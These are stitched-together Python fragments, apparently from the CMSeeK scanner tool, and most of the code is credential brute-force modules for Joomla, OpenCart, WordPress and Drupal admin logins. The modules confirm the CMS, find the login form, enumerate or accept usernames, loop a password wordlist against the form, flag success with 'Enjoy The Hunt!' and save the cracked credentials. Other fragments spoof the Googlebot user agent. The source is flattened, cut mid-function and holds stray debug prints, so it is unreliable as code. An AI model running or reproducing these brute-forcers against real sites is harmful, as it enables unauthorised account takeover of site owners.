def testlogin(url, user, passw): url = url + '/administrator/index.php' cj = http.cookiejar.FileCookieJar("cookieszz") opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor(cj)) joomloginsrc = opener.open(url).read().decode() parser = extInpTags() post_array = parser.feed(joomloginsrc) main_param = {'username': user, 'passwd': passw} other_param = parser.return_array post_data = main_param.copy() post_data.update(other_param) post_datad = urllib.parse.urlencode(post_data).encode("utf-8") ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess') try: with opener.open(url, post_datad) as response: scode = response.read().decode() headers = str(response.info()) rurl = response.geturl() r = [ '1', scode, headers, rurl ] ## 'success code', 'source code', 'http headers', 'redirect url' return r except Exception as e: e = str(e) r = ['2', e, '', ''] ## 'error code', 'error message', 'empty' return r print('hola')
def testlogin( url, user, passw, ): url = url + '/admin/index.php' ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess') try: ckreq = urllib.request.Request(url, data=urllib.parse.urlencode({ 'username': user, 'password': passw }).encode("utf-8"), headers={'User-Agent': ua}) with urllib.request.urlopen(ckreq, timeout=4) as response: scode = response.read().decode() headers = str(response.info()) rurl = response.geturl() r = ['1', scode, headers, rurl] ## 'success code', 'source code', 'http headers' return r except Exception as e: e = str(e) r = ['2', e, '', ''] ## 'error code', 'error message', 'empty' return r print('hola')
def start(): cmseek.clearscreen() cmseek.banner("Joomla Bruteforce Module") url = cmseek.targetinp("") # input('Enter Url: ') cmseek.info("Checking for Joomla") bsrc = cmseek.getsource(url, cmseek.randomua('foodislove')) joomcnf = '0' if bsrc[0] != '1': cmseek.error("Could not get target source, CMSeek is quitting") cmseek.handle_quit() else: ## Parse generator meta tag parse_generator = generator.parse(bsrc[1]) ga = parse_generator[0] ga_content = parse_generator[1] try1 = generator.scan(ga_content) if try1[0] == '1' and try1[1] == 'joom': joomcnf = '1' else: try2 = source.check(bsrc[1], url) if try2[0] == '1' and try2[1] == 'joom': joomcnf = '1' else: try3 = header.check(bsrc[2]) # Headers Check! if try3[0] == '1' and try3[1] == 'joom': joomcnf = '1' else: joomcnf = '0' if joomcnf != '1': cmseek.error('Could not confirm Joomla... CMSeek is quitting') cmseek.handle_quit() else: cmseek.success( "Joomla Confirmed... Confirming form and getting token...") joomloginsrc = cmseek.getsource(url + '/administrator/index.php', cmseek.randomua('thatsprettygay')) if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]: # joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1]) # if len(joomtoken) == 0: # cmseek.error('Unable to get token... CMSeek is quitting!') # cmseek.handle_quit() # cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln) # token = joomtoken[0] joomparamuser = [] rawuser = input( "[~] Enter Usernames with coma as separation without any space (example: cris,harry): " ).split(',') for rusr in rawuser: joomparamuser.append(rusr) joombruteusers = set( joomparamuser ) ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well for user in joombruteusers: passfound = '0' print('\n') cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r") passwords = pwd_file.read().split('\n') passwords.insert(0, user) for password in passwords: if password != '' and password != '\n': sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password) sys.stdout.flush() # print("Testing Pass: "******"Ret URL: " + str(cursrc[3])) if 'logout' in str(cursrc[1]): print('\n') cmseek.success('Password found!') print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") cmseek.success('Enjoy The Hunt!') cmseek.savebrute(url, url + '/administrator/index.php', user, password) passfound = '1' break else: continue break if passfound == '0': cmseek.error('\n\nCould Not find Password!') print('\n\n') else: cmseek.error("Couldn't find login form... CMSeeK is quitting") cmseek.handle_quit()
if args.no_redirect: cmseek.redirect_conf = '2' if args.update: cmseek.update() if args.version: print('\n\n') cmseek.info("CMSeeK Version: " + cmseek.cmseek_version) cmseek.bye() if args.user_agent is not None: cua = args.user_agent elif args.random_agent is not None: cua = cmseek.randomua('random') else: cua = None if args.googlebot: cua = 'Googlebot/2.1 (+http://www.google.com/bot.html)' if args.url is not None: s = args.url target = cmseek.process_url(s) if target != '0': if cua == None: cua = cmseek.randomua() core.main_proc(target, cua) cmseek.handle_quit() elif args.list is not None: sites = args.list
def start(): cmseek.clearscreen() cmseek.banner("OpenCart Bruteforce Module") url = cmseek.targetinp("") # input('Enter Url: ') cmseek.info("Checking for OpenCart") bsrc = cmseek.getsource(url, cmseek.randomua('foodislove')) if bsrc[0] != '1': cmseek.error("Could not get target source, CMSeek is quitting") cmseek.handle_quit() else: try1 = source.generator(bsrc[1]) if try1[0] == '1' and try1[1] == 'oc': occnf = '1' else: try2 = source.check(bsrc[1], url) if try2[0] == '1' and try2[1] == 'oc': occnf = '1' else: occnf = '0' if occnf != '1': cmseek.error('Could not confirm OpenCart... CMSeek is quitting') cmseek.handle_quit() else: cmseek.success( "OpenCart Confirmed... Checking for OpenCart login form") ocloginsrc = cmseek.getsource(url + '/admin/index.php', cmseek.randomua('thatsprettygay')) if ocloginsrc[0] == '1' and '<form' in ocloginsrc[ 1] and 'route=common/login' in ocloginsrc[1]: cmseek.success("Login form found!") ocparamuser = [''] rawuser = input( "[~] Enter Usernames with coma as separation without any space (example: cris,harry): " ).split(',') for rusr in rawuser: ocparamuser.append(rusr) ocbruteusers = set(ocparamuser) ## Strip duplicate usernames for user in ocbruteusers: if user != '': passfound = '0' print('\n') cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r") passwords = pwd_file.read().split('\n') for password in passwords: if password != '' and password != '\n': sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password) sys.stdout.flush() cursrc = testlogin(url, user, password) if 'route=common/dashboard&user_token=' in str( cursrc[3]): cmseek.success('Password found!') print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") cmseek.success('Enjoy The Hunt!') cmseek.savebrute(url, url + '/admin/index.php', user, password) passfound = '1' break else: continue break if passfound == '0': cmseek.error('\n\nCould Not find Password!') print('\n\n') else: cmseek.error("Couldn't find login form... CMSeeK is quitting") cmseek.handle_quit()
def start(): cmseek.clearscreen() cmseek.banner("WordPress Bruteforce Module") url = cmseek.targetinp("") # input('Enter Url: ') cmseek.info("Checking for WordPress") bsrc = cmseek.getsource( url, cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost')) if bsrc[0] != '1': # print(bsrc[1]) cmseek.error("Could not get target source, CMSeek is quitting") cmseek.handle_quit() else: ## Parse generator meta tag parse_generator = generator.parse(bsrc[1]) ga = parse_generator[0] ga_content = parse_generator[1] try1 = generator.scan(ga_content) if try1[0] == '1' and try1[1] == 'wp': wpcnf = '1' else: try2 = source.check(bsrc[1], url) if try2[0] == '1' and try2[1] == 'wp': wpcnf = '1' else: wpcnf = '0' if wpcnf != '1': print(bsrc[1]) cmseek.error('Could not confirm WordPress... CMSeek is quitting') cmseek.handle_quit() else: cmseek.success( "WordPress Confirmed... Checking for WordPress login form") wploginsrc = cmseek.getsource(url + '/wp-login.php', cmseek.randomua('thatsprettygay')) if wploginsrc[0] == '1' and '<form' in wploginsrc[1]: cmseek.success( "Login form found.. Detecting Username For Bruteforce") wpparamuser = [] uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0', bsrc[1]) usernamesgen = uenum[0] wpparamuser = uenum[1] if wpparamuser == []: customuser = input( "[~] CMSeek could not enumerate usernames, enter username if you know any: " ) if customuser == "": cmseek.error("No user found, CMSeek is quitting") else: wpparamuser.append(customuser) wpbruteusers = set(wpparamuser) for user in wpbruteusers: passfound = '0' print('\n') cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r") passwords = pwd_file.read().split('\n') passwords.insert(0, user) for password in passwords: if password != '' and password != '\n': sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password) sys.stdout.flush() cursrc = cmseek.wpbrutesrc(url, user, password) if 'wp-admin' in str(cursrc[3]): cmseek.success('Password found!') print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") cmseek.success('Enjoy The Hunt!') cmseek.savebrute(url, url + '/wp-login.php', user, password) passfound = '1' break else: continue break if passfound == '0': cmseek.error('\n\nCould Not find Password!') print('\n\n') else: cmseek.error("Couldn't find login form... CMSeeK is quitting") # print(wploginsrc[1]) cmseek.handle_quit()
def start(): cmseek.clearscreen() cmseek.banner("Drupal Bruteforce Module") url = cmseek.targetinp("") # input('Enter Url: ') cmseek.info("Checking for Drupal") bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime')) if bsrc[0] != '1': cmseek.error("Could not get target source, CMSeek is quitting") cmseek.handle_quit() else: ## Parse generator meta tag parse_generator = generator.parse(bsrc[1]) ga = parse_generator[0] ga_content = parse_generator[1] try1 = generator.scan(ga_content) if try1[0] == '1' and try1[1] == 'dru': drucnf = '1' else: try2 = source.check( bsrc[1], url) # Confirming Drupal using other source code checks if try2[0] == '1' and try2[1] == 'dru': drucnf = '1' else: try3 = header.check(bsrc[2]) # Headers Check! if try3[0] == '1' and try3[1] == 'dru': drucnf = '1' else: drucnf = '0' if drucnf != '1': cmseek.error('Could not confirm Drupal... CMSeek is quitting') cmseek.handle_quit() else: cmseek.success("Drupal Confirmed... Checking for Drupal login form") druloginsrc = cmseek.getsource( url + '/user/login/', cmseek.randomua('therelivedaguynamedkakashi')) if druloginsrc[0] == '1' and '<form' in druloginsrc[ 1] and 'name="form_id" value="' in druloginsrc[1]: cmseek.success("Login form found! Retriving form id value") fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1]) if fid == []: cmseek.error("Could not find form_id, CMSeeK is quitting!") cmseek.handle_quit() else: cmseek.success('form_id found: ' + cmseek.bold + fid[0] + cmseek.cln) form_id = fid[0] druparamuser = [''] rawuser = input( "[~] Enter Usernames with coma as separation without any space (example: cris,harry): " ).split(',') for rusr in rawuser: druparamuser.append(rusr) drubruteusers = set(druparamuser) ## Strip duplicate usernames for user in drubruteusers: if user != '': print('\n') cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r") passwords = pwd_file.read().split('\n') passwords.insert(0, user) passfound = '0' for password in passwords: if password != '' and password != '\n': sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password) sys.stdout.flush() cursrc = testlogin(url, user, password, form_id) # print(cursrc) if '/user/login/' in str(cursrc): continue else: cmseek.success('Password found! \n\n\n') # print (cursrc) cmseek.success('Password found!') print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") cmseek.success('Enjoy The Hunt!') cmseek.savebrute(url, url + '/user/login', user, password) passfound = '1' break break if passfound == '0': cmseek.error('\n\nCould Not find Password!') print('\n\n') else: cmseek.error("Couldn't find login form... CMSeeK is quitting") cmseek.handle_quit()
print (" [R] Rebuild Cache (Use only when you add any custom module)") print (" [0] Exit CMSeeK :( \n") selone = input("Enter Your Desired Option: ").lower() if selone == 'r': cmseek.update_brute_cache() elif selone == 'u': cmseek.update() elif selone == '0': cmseek.bye() elif selone == "1": # There goes the cms detection thingy cmseek.clearscreen() cmseek.banner("CMS Detection And Deep Scan") site = cmseek.targetinp("") # Get The User input cua = cmseek.randomua() core.main_proc(site,cua) cmseek.handle_quit() elif selone == '2': cmseek.clearscreen() cmseek.banner("CMS Detection And Deep Scan") sites_list = [] sites = input('Enter comma separated urls(http://1.com,https://2.org) or enter path of file containing URLs (comma separated): ') if 'http' not in sites or '://' not in sites: cmseek.info('Treating input as path') try: ot = open(sites, 'r') file_contents = ot.read().replace('\n','') sites_list = file_contents.split(',') except FileNotFoundError:
def cmseekapi(target, cua=None): target = cmseek.process_url(target) if cua == None: cua = cmseek.randomua() core.main_proc(target, cua)